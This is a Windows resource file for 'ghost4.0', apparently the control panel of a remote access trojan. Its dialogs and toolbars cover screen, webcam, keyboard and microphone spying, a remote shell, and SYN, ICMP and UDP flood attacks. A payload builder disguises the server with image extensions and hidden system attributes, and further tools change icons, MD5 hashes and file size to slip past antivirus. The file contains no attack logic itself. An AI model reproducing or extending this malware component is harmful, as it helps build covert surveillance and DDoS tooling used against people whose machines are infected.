STYLE DS_SETFONT | DS_MODALFRAME | WS_POPUP | WS_CAPTION | WS_SYSMENU
CAPTION "本地设置"
FONT 9, "宋体"
BEGIN
    LTEXT           "监听端口:",IDC_STATIC,10,13,37,8
    EDITTEXT        IDC_LINSTEN_PORT,49,10,51,15,ES_AUTOHSCROLL | ES_NUMBER
    LTEXT           "最大上线:",IDC_STATIC,10,33,37,8
    EDITTEXT        IDC_MAX_CONNECT,49,31,51,15,ES_AUTOHSCROLL | ES_NUMBER
    GROUPBOX        "",IDC_STATIC,3,0,115,178
    CONTROL         "最大上线自动",IDC_AUTO_CONNECT,"Button",BS_AUTOCHECKBOX | WS_TABSTOP,10,70,64,10
    PUSHBUTTON      "应用",IDC_BUTTON_APPLY,69,159,40,16
    CONTROL         "禁用上线气泡提示",IDC_CLOSE_TIPS,"Button",BS_AUTOCHECKBOX | WS_TABSTOP,10,85,80,10
    CONTROL         "关闭显示特效",IDC_CLOSE_ANIMATE,"Button",BS_AUTOCHECKBOX | WS_TABSTOP,10,100,64,10
    CONTROL         "窗口关闭时最小化到托盘",IDC_CLOSE_TOTUOPAN,"Button",BS_AUTOCHECKBOX | WS_TABSTOP,10,130,104,10
    CONTROL         "开启上线语音提示",IDC_OPEN_SOUND,"Button",BS_AUTOCHECKBOX | WS_TABSTOP,10,115,80,10
    LTEXT           "在线检测:",IDC_STATIC,9,52,37,8
    EDITTEXT        IDC_CHECK_TIME,50,50,51,15,ES_AUTOHSCROLL | ES_NUMBER
    CONTROL         "关闭自动弹出官方公告",IDC_CLOSE_APPMENT,"Button",BS_AUTOCHECKBOX | WS_TABSTOP,10,145,96,10
END

IDD_LOGON_DIALOG DIALOG 0, 0, 242, 146
STYLE DS_SETFONT | DS_MODALFRAME | WS_POPUP | WS_CAPTION | WS_SYSMENU
CAPTION "欢迎登陆"
FONT 9, "宋体"
BEGIN
    LTEXT           "用户名:",IDC_STATIC,17,70,29,8
    LTEXT           "密码:",IDC_STATIC,20,91,21,8
    EDITTEXT        IDC_USERNAME,47,68,120,15,ES_AUTOHSCROLL
    EDITTEXT        IDC_PASSWORD,47,87,120,15,ES_PASSWORD | ES_AUTOHSCROLL
    DEFPUSHBUTTON   "登录",IDC_LOGON,185,68,40,35
    CONTROL         "记住密码",IDC_REMEMBER,"Button",BS_AUTOCHECKBOX | WS_TABSTOP,47,111,50,10
    CONTROL         "自动登录",IDC_AUTO_LOGON,"Button",BS_AUTOCHECKBOX | WS_TABSTOP,115,111,50,10
    CONTROL         IDB_BITMAP_LOGON,IDC_STATIC,"Static",SS_BITMAP,0,0,241,63
    CONTROL         "Progress1",IDC_PROGRESS1,"msctls_progress32",WS_BORDER,0,138,241,8
    LTEXT           "",IDC_STATIC_TIP,20,125,215,10,SS_NOTIFY
END

IDD_MIANZESHENGMING DIALOG 0, 0, 472, 347
STYLE DS_SETFONT | DS_MODALFRAME | WS_POPUP | WS_CAPTION | WS_SYSMENU
CAPTION "ghost4.0 免责声明"
FONT 9, "宋体"
BEGIN
    EDITTEXT        IDC_EDIT1,7,7,471,321,ES_MULTILINE | ES_READONLY | ES_WANTRETURN | WS_VSCROLL
    PUSHBUTTON      "》》确定并登入",IDC_BUTTON1,389,329,80,16
    CONTROL         "我已阅读并且同意以上服务条款",IDC_RADIO1,"Button",BS_AUTORADIOBUTTON,19,335,128,10
    CONTROL         "我不同意以上服务条款",IDC_RADIO2,"Button",BS_AUTORADIOBUTTON,191,335,96,10
    CONTROL         "关闭所有特效",IDC_CHECK1,"Button",BS_AUTOCHECKBOX | WS_TABSTOP,300,335,64,10
END

IDD_TOOLS_DIALOG DIALOG 0, 0, 332, 220
STYLE DS_SETFONT | DS_MODALFRAME | WS_MINIMIZEBOX | WS_POPUP | WS_CAPTION | WS_SYSMENU
CAPTION "实用工具"
FONT 9, "宋体"
BEGIN
    GROUPBOX        "        图标修改器",IDC_STATIC,3,14,160,76
    GROUPBOX        "        MD5修改器",IDC_STATIC,170,14,160,166
    ICON            IDI_ICON_TOOL,IDC_STATIC,15,5,20,20
    ICON            IDI_ICON_MD5,IDC_STATIC,180,5,20,20
    LTEXT           "图标路径:",IDC_STATIC,8,33,37,8
    LTEXT           "EXE 路径:",IDC_STATIC,7,52,37,8
    EDITTEXT        IDC_EDIT1,45,32,90,13,ES_AUTOHSCROLL
    EDITTEXT        IDC_EDIT2,45,50,90,13,ES_AUTOHSCROLL
    PUSHBUTTON      "...",IDC_SELECTFILE,310,45,15,13
    PUSHBUTTON      "...",IDC_BUTTON3,140,49,15,13
    PUSHBUTTON      "修改",IDC_BUTTON2,90,68,45,15
    GROUPBOX        "        PE文件图标提取精灵",IDC_STATIC,2,104,160,76
    ICON            IDI_ICON_TOOL,IDC_STATIC,14,95,20,20
    PUSHBUTTON      "保存图标",IDC_BUTTON_SAVEAS,114,133,45,15
    PUSHBUTTON      "提取图标",IDC_SELECTICON,114,114,45,15
    LISTBOX         IDC_LIST2,5,119,100,55,LBS_SORT | LBS_NOINTEGRALHEIGHT | WS_VSCROLL | WS_TABSTOP
    ICON            "",IDC_ICONS,125,152,20,20
    LTEXT           "文件路径:",IDC_STATIC,175,31,37,8
    EDITTEXT        IDC_EDIT_PATH,175,45,130,16,ES_AUTOHSCROLL
    LTEXT           "原文件MD5:",IDC_STATIC,175,65,41,8
    LTEXT           "修改后MD5:",IDC_STATIC,175,100,41,8
    EDITTEXT        IDC_OMD3,175,77,150,16,ES_AUTOHSCROLL | ES_READONLY
    EDITTEXT        IDC_CMD5,175,113,150,16,ES_AUTOHSCROLL | ES_READONLY
    LTEXT           "间隔时间:",IDC_STATIC,175,159,37,8
    EDITTEXT        IDC_EDIT_TIME1,215,157,23,12,ES_MULTILINE | ES_AUTOHSCROLL
    LTEXT           "/秒",IDC_STATIC,243,160,13,8
    PUSHBUTTON      "开始",IDC_START,260,155,30,15
    PUSHBUTTON      "停止",IDC_STOP,293,155,30,15
    LTEXT           "",IDC_STATIC_COUNT,216,31,100,11
    CONTROL         "共享文件只读",IDC_CHECK3,"Button",BS_AUTOCHECKBOX | WS_TABSTOP,255,135,68,10
    PUSHBUTTON      "...",IDC_BUTTON4,140,33,15,13
    GROUPBOX        "文件体积增加器",IDC_STATIC,3,183,325,35
    EDITTEXT        IDC_EDIT4,45,197,99,14,ES_AUTOHSCROLL
    LTEXT           "文件路径:",IDC_STATIC,5,200,37,8
    PUSHBUTTON      "...",IDC_FILE_PATH,148,198,15,11
    CONTROL         "Slider1",IDC_SLIDER1,"msctls_trackbar32",TBS_BOTH | TBS_NOTICKS | WS_TABSTOP,169,197,82,14
    EDITTEXT        IDC_EDIT5,251,197,27,14,ES_AUTOHSCROLL
    LTEXT           "/KB",IDC_STATIC,282,200,13,8
    PUSHBUTTON      "增加",IDC_BUTTON5,301,196,22,16
END

IDD_CHAT_DIALOG DIALOG 0, 0, 228, 225
STYLE DS_SETFONT | DS_MODALFRAME | WS_MINIMIZEBOX | WS_POPUP | WS_CAPTION | WS_SYSMENU
CAPTION "消息对话"
FONT 9, "宋体"
BEGIN
    CONTROL         "",IDC_RADIO1,"Button",BS_AUTORADIOBUTTON,10,22,16,8
    CONTROL         "",IDC_RADIO2,"Button",BS_AUTORADIOBUTTON,63,22,16,8
    CONTROL         "",IDC_RADIO3,"Button",BS_AUTORADIOBUTTON,116,22,16,8
    CONTROL         "",IDC_RADIO4,"Button",BS_AUTORADIOBUTTON,171,22,16,8
    CONTROL         "确定",IDC_RADIO12,"Button",BS_AUTORADIOBUTTON | WS_GROUP,6,64,32,10
    CONTROL         "帮助",IDC_RADIO10,"Button",BS_AUTORADIOBUTTON,46,64,32,10
    CONTROL         "是|否|取消",IDC_RADIO13,"Button",BS_AUTORADIOBUTTON,83,80,56,10
    CONTROL         "是|否",IDC_RADIO7,"Button",BS_AUTORADIOBUTTON,83,64,32,10
    CONTROL         "取消|重试|继续",IDC_RADIO11,"Button",BS_AUTORADIOBUTTON,6,80,72,10
    CONTROL         "确定|取消",IDC_RADIO5,"Button",BS_AUTORADIOBUTTON,148,64,52,10
    CONTROL         "关于|重试|忽略",IDC_RADIO8,"Button",BS_AUTORADIOBUTTON,148,80,72,10
    GROUPBOX        "图标",IDC_STATIC,3,4,223,40
    ICON            "",IDC_STATIC_ICON1,29,14,21,21,SS_NOTIFY
    ICON            "",IDC_STATIC_ICON2,82,15,21,21,SS_NOTIFY
    ICON            "",IDC_STATIC_ICON3,135,15,21,21,SS_NOTIFY
    ICON            "",IDC_STATIC_ICON4,190,15,21,21,SS_NOTIFY
    GROUPBOX        "按钮",IDC_STATIC,3,50,223,48
    GROUPBOX        "文本",IDC_STATIC,3,105,223,95
    LTEXT           "标题:",IDC_STATIC,7,120,21,8
    LTEXT           "内容:",IDC_STATIC,7,140,21,8
    EDITTEXT        IDC_EDIT_TITLE,30,115,190,15,ES_AUTOHSCROLL
    EDITTEXT        IDC_EDIT_TEXT,30,135,190,60,ES_MULTILINE | ES_WANTRETURN | WS_VSCROLL
    PUSHBUTTON      "预览",IDC_BUTTON1,93,205,50,15
    PUSHBUTTON      "发送",IDC_BUTTON3,153,205,50,15
END

IDD_CLOSE_DIALOG DIALOG 0, 0, 233, 19
STYLE DS_SETFONT | WS_POPUP
FONT 9, "新宋体"
BEGIN
    CONTROL         "Progress1",IDC_PROGRESS1,"msctls_progress32",WS_BORDER,0,10,233,10
    LTEXT           "",IDC_STATIC_SHOW,18,0,203,8,SS_NOTIFY
END

IDD_COMMUNIQUE_DIALOG DIALOG 0, 0, 166, 156
STYLE DS_SETFONT | DS_MODALFRAME | WS_POPUP | WS_CAPTION | WS_SYSMENU
CAPTION "官方公告"
FONT 9, "宋体"
BEGIN
    GROUPBOX        "",IDC_STATIC,1,10,164,145
    ICON            IDR_MAINFRAME,IDC_STATIC,15,1,21,21
    LTEXT           "",IDC_STATIC_SHOW,3,25,157,125
END

IDD_PLUGIN_DIALOG DIALOGEX 0, 0, 294, 213
STYLE DS_SETFONT | WS_MINIMIZEBOX | WS_POPUP | WS_CAPTION | WS_SYSMENU | WS_THICKFRAME
EXSTYLE WS_EX_ACCEPTFILES
FONT 9, "宋体", 0, 0, 0x1
BEGIN
    EDITTEXT        IDC_EDIT,1,149,292,50,ES_MULTILINE | ES_AUTOVSCROLL | ES_AUTOHSCROLL | ES_READONLY | ES_WANTRETURN | WS_VSCROLL | WS_HSCROLL
    LTEXT           "插件运行结果:",IDC_STATIC,3,137,53,8
    CONTROL         "List1",IDC_LIST1,"SysListView32",LVS_REPORT | LVS_SINGLESEL | WS_BORDER | WS_TABSTOP,1,1,291,118
    LTEXT           "-->请将插件拖放到此处<--",IDC_STATIC,99,123,97,8
    CONTROL         "Progress1",IDC_PROGRESS1,"msctls_progress32",WS_BORDER,0,202,293,9
END

IDD_ADD_USER DIALOG 0, 0, 150, 82
STYLE DS_SETFONT | DS_MODALFRAME | WS_POPUP | WS_CAPTION | WS_SYSMENU
CAPTION "创建用户 -- 无NET模式"
FONT 9, "宋体"
BEGIN
    DEFPUSHBUTTON   "确定",IDOK,16,61,50,14
    PUSHBUTTON      "取消",IDCANCEL,84,61,50,14
    EDITTEXT        IDC_EDIT_user,50,6,88,12,ES_AUTOHSCROLL
    EDITTEXT        IDC_EDIT_admin,50,39,88,12,ES_AUTOHSCROLL
    EDITTEXT        IDC_EDIT_pass,50,22,88,12,ES_AUTOHSCROLL
    LTEXT           "用户名称:",IDC_STATIC,9,8,37,8
    LTEXT           "用户组:",IDC_STATIC,9,40,29,8
    LTEXT           "用户密码:",IDC_STATIC,9,24,37,8
END

IDD_UPDATE_DLG DIALOG 0, 0, 217, 226
STYLE DS_SETFONT | DS_MODALFRAME | WS_CAPTION | WS_SYSMENU
CAPTION "更新IP"
FONT 9, "宋体"
BEGIN
    LTEXT           "FTP地址:",IDC_STATIC,15,17,40,10
    EDITTEXT        IDC_EDIT_FTPIP,61,14,144,12,ES_AUTOHSCROLL
    LTEXT           "FTP端口:",IDC_STATIC,15,30,32,9
    EDITTEXT        IDC_EDIT_FTPPORT,61,27,62,12,ES_AUTOHSCROLL
    LTEXT           "帐号:",IDC_STATIC,15,44,35,8
    EDITTEXT        IDC_EDIT_FTPUSER,61,40,144,12,ES_AUTOHSCROLL
    LTEXT           "密码:",IDC_STATIC,15,55,34,8
    EDITTEXT        IDC_EDIT_FTPPASS,61,53,144,12,ES_PASSWORD | ES_AUTOHSCROLL
    CONTROL         "",IDC_STATIC,"Static",SS_BLACKRECT | SS_SUNKEN,7,67,206,1
    EDITTEXT        IDC_FTPURL,61,70,144,12,ES_AUTOHSCROLL
    CONTROL         "",IDC_STATIC,"Static",SS_BLACKRECT | SS_SUNKEN,7,84,204,1
    LTEXT           "您的IP:",IDC_STATIC,12,90,40,10
    LTEXT           "端口:",IDC_STATIC,12,103,22,9
    EDITTEXT        IDC_COMBO_FTPPORT,61,102,62,12,ES_AUTOHSCROLL
    DEFPUSHBUTTON   "更新",IDC_BTN_FTPUPDATE,158,105,46,14,BS_NOTIFY
    COMBOBOX        IDC_COMBO_FTPIP,61,88,144,63,CBS_DROPDOWN | CBS_SORT | WS_VSCROLL | WS_TABSTOP
    LTEXT           "帐号:",IDC_STATIC,15,150,35,10
    EDITTEXT        IDC_EDIT_DNSUSER,61,147,141,12,ES_AUTOHSCROLL
    LTEXT           "密码:",IDC_STATIC,15,162,33,8
    EDITTEXT        IDC_EDIT_DNSPASS,61,160,141,12,ES_PASSWORD | ES_AUTOHSCROLL
    CONTROL         "",IDC_STATIC,"Static",SS_BLACKFRAME | SS_SUNKEN,11,187,200,1
    LTEXT           "域名:",IDC_STATIC,15,174,21,8
    EDITTEXT        IDC_EDIT_DNSDOMAIN,61,172,141,12,ES_AUTOHSCROLL
    LTEXT           "您的IP:",IDC_STATIC,15,191,31,10
    COMBOBOX        IDC_COMBO_DNSIP,61,189,141,64,CBS_DROPDOWN | CBS_SORT | WS_VSCROLL | WS_TABSTOP
    DEFPUSHBUTTON   "更新",IDC_BTN_DNSUPDATE,157,203,46,14,BS_NOTIFY
    LTEXT           "申请希网域名",IDC_STATIC_3322,41,207,79,10
    GROUPBOX        "FTP更新",IDC_STATIC,7,4,206,126
    GROUPBOX        "希网3322更新",IDC_STATIC,7,133,206,89
    LTEXT           "申请FTP空间",IDC_STATIC_FTP,44,118,45,8
END

IDD_SKIN_COLOUR DIALOG 0, 0, 200, 107
STYLE DS_SETFONT | DS_MODALFRAME | WS_POPUP | WS_CAPTION | WS_SYSMENU
CAPTION "调节皮肤颜色"
FONT 9, "宋体"
BEGIN
    GROUPBOX        "HSB 调整",IDC_STATIC,6,0,188,82
    LTEXT           "色相:",IDC_STATIC,17,17,26,10
    LTEXT           "饱和:",IDC_STATIC,17,40,24,10
    LTEXT           "亮度:",IDC_STATIC,16,64,22,10
    CONTROL         "Slider1",IDC_SLIDER1,"msctls_trackbar32",TBS_BOTH | TBS_NOTICKS | WS_TABSTOP,42,12,136,20
    CONTROL         "Slider2",IDC_SLIDER2,"msctls_trackbar32",TBS_BOTH | TBS_NOTICKS | WS_TABSTOP,41,37,136,20
    CONTROL         "Slider3",IDC_SLIDER3,"msctls_trackbar32",TBS_BOTH | TBS_NOTICKS | WS_TABSTOP,41,60,136,20
    PUSHBUTTON      "保存",IDC_SET_SKIN,25,87,52,16,BS_FLAT
    PUSHBUTTON      "退出",IDC_EXIT,119,87,52,16,BS_FLAT
END


/////////////////////////////////////////////////////////////////////////////
//
// Version
//

VS_VERSION_INFO VERSIONINFO
 FILEVERSION 3,5,0,0
 PRODUCTVERSION 3,5,0,0
 FILEFLAGSMASK 0x3fL
#ifdef _DEBUG
 FILEFLAGS 0x1L
#else
 FILEFLAGS 0x0L
#endif
 FILEOS 0x4L
 FILETYPE 0x1L
 FILESUBTYPE 0x0L
BEGIN
    BLOCK "StringFileInfo"
    BEGIN
        BLOCK "080404b0"
        BEGIN
            VALUE "FileDescription", "ghost4.0"
            VALUE "FileVersion", "2.1"
            VALUE "InternalName", "ghost4.0"
            VALUE "LegalCopyright", "版权所有 (C) 2012"
            VALUE "OriginalFilename", "ghost4.0"
            VALUE "ProductName", "MFC 应用程序员"
            VALUE "ProductVersion", "2.1"
        END
    END
    BLOCK "VarFileInfo"
    BEGIN
        VALUE "Translation", 0x804, 1200
    END
END


/////////////////////////////////////////////////////////////////////////////
//
// DESIGNINFO
//

#ifdef APSTUDIO_INVOKED
GUIDELINES DESIGNINFO
BEGIN
    IDD_ABOUTBOX, DIALOG
    BEGIN
        LEFTMARGIN, 7
        RIGHTMARGIN, 253
        TOPMARGIN, 7
        BOTTOMMARGIN, 142
    END

    IDD_BUILD, DIALOG
    BEGIN
        LEFTMARGIN, 7
        RIGHTMARGIN, 404
        TOPMARGIN, 6
        BOTTOMMARGIN, 134
    END

    IDD_FILE, DIALOG
    BEGIN
        LEFTMARGIN, 7
        RIGHTMARGIN, 351
        TOPMARGIN, 7
        BOTTOMMARGIN, 268
    END

    IDD_SETTINGS, DIALOG
    BEGIN
        LEFTMARGIN, 7
        RIGHTMARGIN, 414
        TOPMARGIN, 6
        BOTTOMMARGIN, 149
    END

    IDD_TRANSFERMODE_DLG, DIALOG
    BEGIN
        LEFTMARGIN, 7
        RIGHTMARGIN, 364
        TOPMARGIN, 7
        BOTTOMMARGIN, 67
    END

    IDD_SCREENSPY, DIALOG
    BEGIN
        LEFTMARGIN, 7
        RIGHTMARGIN, 503
        TOPMARGIN, 7
        BOTTOMMARGIN, 322
    END

    IDD_WEBCAM, DIALOG
    BEGIN
        LEFTMARGIN, 7
        RIGHTMARGIN, 169
        TOPMARGIN, 7
        BOTTOMMARGIN, 137
    END

    IDD_KEYBOARD, DIALOG
    BEGIN
        LEFTMARGIN, 7
        RIGHTMARGIN, 321
        TOPMARGIN, 7
        BOTTOMMARGIN, 248
    END

    IDD_SYSTEM, DIALOG
    BEGIN
        LEFTMARGIN, 7
        RIGHTMARGIN, 267
        TOPMARGIN, 7
        BOTTOMMARGIN, 252
    END

    IDD_SHELL, DIALOG
    BEGIN
        LEFTMARGIN, 7
        RIGHTMARGIN, 432
        TOPMARGIN, 7
        BOTTOMMARGIN, 263
    END

    IDD_AUDIO, DIALOG
    BEGIN
        LEFTMARGIN, 7
        RIGHTMARGIN, 218
        TOPMARGIN, 7
        BOTTOMMARGIN, 60
    END

    IDD_ATTACK_DIALOG, DIALOG
    BEGIN
        LEFTMARGIN, 7
        RIGHTMARGIN, 523
        TOPMARGIN, 7
        BOTTOMMARGIN, 312
    END

    IDD_FLOWATTACK_DIALOG, DIALOG
    BEGIN
        LEFTMARGIN, 7
        RIGHTMARGIN, 464
        TOPMARGIN, 7
        BOTTOMMARGIN, 299
    END

    IDD_CUSTOMATTACK_DIALOG, DIALOG
    BEGIN
        LEFTMARGIN, 7
        RIGHTMARGIN, 524
        TOPMARGIN, 7
        BOTTOMMARGIN, 286
    END

    IDD_SIFT_HOST, DIALOG
    BEGIN
        LEFTMARGIN, 7
        RIGHTMARGIN, 243
        TOPMARGIN, 7
        BOTTOMMARGIN, 99
    END

    IDD_BTACK_DIALOG, DIALOG
    BEGIN
        LEFTMARGIN, 7
        RIGHTMARGIN, 400
        TOPMARGIN, 7
        BOTTOMMARGIN, 263
    END

    IDD_BUILDDIALOG, DIALOG
    BEGIN
        LEFTMARGIN, 7
        RIGHTMARGIN, 368
        TOPMARGIN, 7
        BOTTOMMARGIN, 166
    END

    IDD_CONFIG_DIALOG, DIALOG
    BEGIN
        LEFTMARGIN, 7
        RIGHTMARGIN, 115
        TOPMARGIN, 7
        BOTTOMMARGIN, 176
    END

    IDD_LOGON_DIALOG, DIALOG
    BEGIN
        LEFTMARGIN, 7
        RIGHTMARGIN, 235
        TOPMARGIN, 7
        BOTTOMMARGIN, 139
    END

    IDD_MIANZESHENGMING, DIALOG
    BEGIN
        LEFTMARGIN, 7
        RIGHTMARGIN, 465
        TOPMARGIN, 7
        BOTTOMMARGIN, 345
    END

    IDD_TOOLS_DIALOG, DIALOG
    BEGIN
        LEFTMARGIN, 7
        RIGHTMARGIN, 325
        TOPMARGIN, 7
        BOTTOMMARGIN, 213
    END

    IDD_CHAT_DIALOG, DIALOG
    BEGIN
        LEFTMARGIN, 7
        RIGHTMARGIN, 221
        TOPMARGIN, 7
        BOTTOMMARGIN, 218
    END

    IDD_CLOSE_DIALOG, DIALOG
    BEGIN
        LEFTMARGIN, 7
        RIGHTMARGIN, 226
        TOPMARGIN, 7
        BOTTOMMARGIN, 12
    END

    IDD_COMMUNIQUE_DIALOG, DIALOG
    BEGIN
        LEFTMARGIN, 7
        RIGHTMARGIN, 159
        TOPMARGIN, 7
        BOTTOMMARGIN, 149
    END

    IDD_PLUGIN_DIALOG, DIALOG
    BEGIN
        LEFTMARGIN, 7
        RIGHTMARGIN, 287
        TOPMARGIN, 7
        BOTTOMMARGIN, 206
    END

    IDD_UPDATE_DLG, DIALOG
    BEGIN
    END

    IDD_SKIN_COLOUR, DIALOG
    BEGIN
        LEFTMARGIN, 7
        RIGHTMARGIN, 180
        TOPMARGIN, 7
        BOTTOMMARGIN, 87
    END
END
#endif    // APSTUDIO_INVOKED


/////////////////////////////////////////////////////////////////////////////
//
// Cursor
//

IDC_DRAG                CURSOR                  "res\\1.cur"
IDC_MUTI_DRAG           CURSOR                  "res\\2.cur"
IDC_CURSOR3             CURSOR                  "res\\3.cur"
IDC_CURSOR4             CURSOR                  "res\\4.cur"
IDC_DOT                 CURSOR                  "res\\dot.cur"

/////////////////////////////////////////////////////////////////////////////
//
// Toolbar
//

IDR_TOOLBAR1 TOOLBAR 24, 24
BEGIN
    BUTTON      IDT_LOCAL_PREV
    SEPARATOR
    BUTTON      IDT_LOCAL_COPY
    BUTTON      IDT_LOCAL_DELETE
    BUTTON      IDT_LOCAL_NEWFOLDER
    SEPARATOR
    BUTTON      IDT_LOCAL_VIEW
    BUTTON      IDT_LOCAL_STOP
END

IDR_MAINFRAME TOOLBAR 26, 25
BEGIN
    BUTTON      IDT_DDOSATTACK
    BUTTON      IDT_SCREENSPY
    SEPARATOR
    BUTTON      IDT_FILEMANEGERS
    SEPARATOR
    BUTTON      IDT_KETBOADSPY
    BUTTON      IDT_COMMANDSHELL
    SEPARATOR
    BUTTON      IDT_SYSTEMMANAGER
    BUTTON      IDT_VEDIOSPY
    BUTTON      IDT_SOUNDSPY
    BUTTON      IDT_CREATESERVER
    BUTTON      IDT_TOOLS
    BUTTON      IDT_ABOUTTERMINATE
    BUTTON      IDT_EXITPROCESS
    BUTTON      IDT_TEMP4
    BUTTON      IDT_TEMP5
    BUTTON      IDT_TEMP1
    BUTTON      IDT_TEMP2
END

IDR_TOOLBAR2 TOOLBAR 24, 24
BEGIN
    BUTTON      IDT_REMOTE_PREV
    SEPARATOR
    BUTTON      IDT_REMOTE_COPY
    BUTTON      IDT_REMOTE_DELETE
    BUTTON      IDT_REMOTE_NEWFOLDER
    SEPARATOR
    BUTTON      IDT_REMOTE_VIEW
    BUTTON      IDT_REMOTE_STOP
END


/////////////////////////////////////////////////////////////////////////////
//
// Bitmap
//

IDR_TOOLBAR1            BITMAP                  "res\\toolbar1.bmp"
IDB_TOOLBAR_ENABLE      BITMAP                  "res\\Bitmap_4.bmp"
IDR_MAINFRAME           BITMAP                  "res\\toolbar2.bmp"
IDB_TOOLBAR_DISABLE     BITMAP                  "res\\Bitmap_5.bmp"
IDR_TOOLBAR2            BITMAP                  "res\\toolbar3.bmp"
IDB_BITMAP_SCREEN       BITMAP                  "res\\屏幕监控.bmp"
IDB_BITMAP_FILEMANAGER  BITMAP                  "res\\文件管理.bmp"
IDB_BITMAP_KEYBORD      BITMAP                  "res\\键盘监控.bmp"
IDB_BITMAP_COMMAND      BITMAP                  "res\\远程CMD.bmp"
IDB_BITMAP_SYSMANAGER   BITMAP                  "res\\系统管理.bmp"
IDB_BITMAP_VEDIO        BITMAP                  "res\\视频监控.bmp"
IDB_BITMAP_SOUND        BITMAP                  "res\\语音监听.bmp"
IDB_BITMAP_ABOUT        BITMAP                  "res\\退出程序.bmp"
IDB_BITMAP_CREATESERVER BITMAP                  "res\\生成服务.bmp"
IDB_BITMAP_ATTACK       BITMAP                  "res\\DDOS攻击.bmp"
IDB_BITMAP_UPDATE       BITMAP                  "res\\关于.bmp"
IDB_BITMAP_SIFT         BITMAP                  "res\\使用工具.bmp"
IDB_BITMAP_LOGON        BITMAP                  "res\\logon.bmp"
IDB_BITMAP_INFO         BITMAP                  "res\\ShowInfo.bmp"

/////////////////////////////////////////////////////////////////////////////
//
// BSS
//


IDR_BSS1                BSS                     "res\\Logo.gif"
IDR_BSS2                BSS                     "GetRand.dll"

/////////////////////////////////////////////////////////////////////////////
//
// Dialog Info
//

IDD_FLOWATTACK_DIALOG DLGINIT
BEGIN
    IDC_COMBO_MODEL, 0x403, 13, 0
0xf8cd, 0xbed5, 0x203a, 0xe4b1, 0xecd2, 0x4343, "\000" 
    IDC_COMBO_MODEL, 0x403, 14, 0
0xf8cd, 0xbed5, 0x203a, 0xa3c4, 0xe2c4, 0x4920, 0x0045, 
    IDC_COMBO_MODEL, 0x403, 13, 0
0xf8cd, 0xbed5, 0x203a, 0xd6c2, 0xd8bb, 0x4343, "\000" 
    IDC_COMBO_MODEL, 0x403, 16, 0
0xf7c1, 0xbfc1, 0x203a, 0x4354, 0x2050, 0x4c46, 0x4f4f, 0x0044, 
    IDC_COMBO_MODEL, 0x403, 16, 0
0xf7c1, 0xbfc1, 0x203a, 0x4455, 0x2050, 0x4c46, 0x4f4f, 0x0044, 
    IDC_COMBO_MODEL, 0x403, 18, 0
0xfeb7, 0xf1ce, 0xf7c6, 0x203a, 0x5953, 0x204e, 0x4c46, 0x4f4f, 0x0044, 

    IDC_COMBO_MODEL, 0x403, 19, 0
0xfeb7, 0xf1ce, 0xf7c6, 0x203a, 0x4349, 0x504d, 0x4620, 0x4f4c, 0x444f, 
"\000" 
    IDC_COMBO_MODEL, 0x403, 15, 0
0xe4c6, 0xfbcb, 0x203a, 0xc7d6, 0xdcc4, 0xa3c4, 0xbdca, "\000" 
    0
END

IDD_CUSTOMATTACK_DIALOG DLGINIT
BEGIN
    IDC_COMBO_MODEL, 0x403, 9, 0
0x4354, 0x2050, 0xa2b7, 0xfcb0, "\000" 
    IDC_COMBO_MODEL, 0x403, 9, 0
0x4455, 0x2050, 0xa2b7, 0xfcb0, "\000" 
    0
END

IDD_BTACK_DIALOG DLGINIT
BEGIN
    IDC_COMBO1, 0x403, 19, 0
0xc2cf, 0xd8d4, 0xcbd4, 0xd0d0, 0xd528, 0xb3fd, 0xd4a3, 0xd0cb, 0x29d0, 
"\000" 
    IDC_COMBO1, 0x403, 19, 0
0xc2cf, 0xd8d4, 0xcbd4, 0xd0d0, 0xd228, 0xb2fe, 0xd4d8, 0xd0cb, 0x29d0, 
"\000" 
    IDC_COMBO1, 0x403, 19, 0
0xf2b4, 0xaabf, 0xf8cd, 0xb3d2, 0xd528, 0xb3fd, 0xb4a3, 0xbff2, 0x29aa, 
"\000" 
    IDC_COMBO1, 0x403, 19, 0
0xf2b4, 0xaabf, 0xf8cd, 0xb3d2, 0xd228, 0xb2fe, 0xb4d8, 0xbff2, 0x29aa, 
"\000" 
    0
END

IDD_BUILDDIALOG DLGINIT
BEGIN
    IDC_FILESUFFIEX, 0x403, 5, 0
0x6a2e, 0x6770, "\000" 
    IDC_FILESUFFIEX, 0x403, 5, 0
0x622e, 0x706d, "\000" 
    IDC_FILESUFFIEX, 0x403, 5, 0
0x642e, 0x6c6c, "\000" 
    IDC_FILESUFFIEX, 0x403, 5, 0
0x672e, 0x6669, "\000" 
    IDC_FILESUFFIEX, 0x403, 5, 0
0x702e, 0x6473, "\000" 
    IDC_FILESUFFIEX, 0x403, 5, 0
0x652e, 0x6578, "\000" 
    IDC_FILESUFFIEX, 0x403, 5, 0
0x742e, 0x7478, "\000" 
    IDC_FILEATTRIBUTE, 0x403, 5, 0
0xfdd5, 0xa3b3, "\000" 
    IDC_FILEATTRIBUTE, 0x403, 5, 0
0xfed2, 0xd8b2, "\000" 
    IDC_FILEATTRIBUTE, 0x403, 5, 0
0xb5cf, 0xb3cd, "\000" 
    IDC_FILEATTRIBUTE, 0x403, 5, 0
0xbbd6, 0xc1b6, "\000" 
    IDC_FILEATTRIBUTE, 0x403, 10, 0
0xfed2, 0xd8b2, 0xcf2b, 0xcdb5, 0x00b3, 
    IDC_FILEATTRIBUTE, 0x403, 15, 0
0xfed2, 0xd8b2, 0xcf2b, 0xcdb5, 0x2bb3, 0xbbd6, 0xc1b6, "\000" 
    IDC_DIRECTORY, 0x403, 14, 0
0x5325, 0x7379, 0x6574, 0x526d, 0x6f6f, 0x2574, 0x005c, 
    IDC_DIRECTORY, 0x403, 23, 0
0x5325, 0x7379, 0x6574, 0x526d, 0x6f6f, 0x2574, 0x535c, 0x7379, 0x6574, 
0x336d, 0x5c32, "\000" 
    IDC_DIRECTORY, 0x403, 16, 0
0x5025, 0x6f72, 0x7267, 0x6d61, 0x6946, 0x656c, 0x2573, 0x005c, 
    IDC_DIRECTORY, 0x403, 22, 0
0x4325, 0x6d6f, 0x6f6d, 0x506e, 0x6f72, 0x7267, 0x6d61, 0x6946, 0x656c, 
0x2573, 0x005c, 
    IDC_DIRECTORY, 0x403, 19, 0
0x4125, 0x4c4c, 0x5355, 0x5245, 0x5053, 0x4f52, 0x4946, 0x454c, 0x5c25, 
"\000" 
    IDC_DIRECTORY, 0x403, 11, 0
0x4125, 0x5050, 0x4144, 0x4154, 0x5c25, "\000" 
    IDC_DIRECTORY, 0x403, 8, 0
0x5425, 0x4d45, 0x2550, 0x005c, 
    0
END


/////////////////////////////////////////////////////////////////////////////
//
// WAVE
//

